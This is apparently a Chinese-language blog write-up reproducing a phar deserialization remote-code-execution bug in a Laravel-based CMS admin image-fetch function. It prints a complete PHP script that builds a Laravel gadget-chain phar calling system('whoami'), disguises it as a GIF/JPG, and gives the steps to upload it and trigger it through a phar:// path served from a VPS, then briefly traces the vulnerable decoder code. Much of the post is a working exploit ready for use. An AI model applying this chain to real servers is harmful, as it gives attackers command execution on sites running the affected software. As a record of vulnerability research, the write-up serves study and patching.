文章目录
写在前面利用姿势分析写在前面
之前就想复现来着了,后来给我忘了,今晚补上吧
利用姿势
首先用phpggc
生成一个phar
,当然嫌弃懒的话可以用这个
<?phpnamespace Illuminate\Broadcasting{class PendingBroadcast{protected $events;protected $event;public function __construct($events, $event){$this->events = $events;$this->event = $event;}}class BroadcastEvent{protected $connection;public function __construct($connection){$this->connection = $connection;}}}namespace Illuminate\Bus{class Dispatcher{protected $queueResolver;public function __construct($queueResolver){$this->queueResolver = $queueResolver;}}}namespace{$command = new Illuminate\Broadcasting\BroadcastEvent('whoami');$dispater = new Illuminate\Bus\Dispatcher("system");$PendingBroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispater,$command);$phar = new Phar('phar.phar');$phar -> stopBuffering();$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");$phar -> addFromString('test.txt','test');$phar -> setMetadata($PendingBroadcast);$phar -> stopBuffering();rename('phar.phar','phar.jpg');}
之后上传到你的后台获得相对路径
之后在你的vps中写入
phar://./upload/image/06/uzOpshR76Znv0gG6mvL9YHBRXPI5EaEDFpwqfgCp.gif
最后请求,成功执行
分析
漏洞点和之前爆出的任意文件读取与RCE那个地方一样,在Http/Controllers/Admin/NEditorController.php
下的fetchImageFile
函数,因为我传入的不是Webp文件,所以进入Image::make($data);
,而这个data变量也就是请求返回的内容
一直跟进到src/Intervention/Image/AbstractDecoder.php
下的init
方法
public function init($data){$this->data = $data;switch (true) {case $this->isGdResource():return $this->initFromGdResource($this->data);case $this->isImagick():return $this->initFromImagick($this->data);case $this->isInterventionImage():return $this->initFromInterventionImage($this->data);case $this->isSplFileInfo():return $this->initFromPath($this->data->getRealPath());case $this->isBinary():return $this->initFromBinary($this->data);case $this->isUrl():return $this->initFromUrl($this->data);case $this->isStream():return $this->initFromStream($this->data);case $this->isDataUrl():return $this->initFromBinary($this->decodeDataUrl($this->data));case $this->isFilePath():return $this->initFromPath($this->data);// isBase64 has to be after isFilePath to prevent false positivescase $this->isBase64():return $this->initFromBinary(base64_decode($this->data));default:throw new NotReadableException("Image source not readable");}}
在isUrl分支
继续跟踪
妥妥的可以触发phar://
反序列化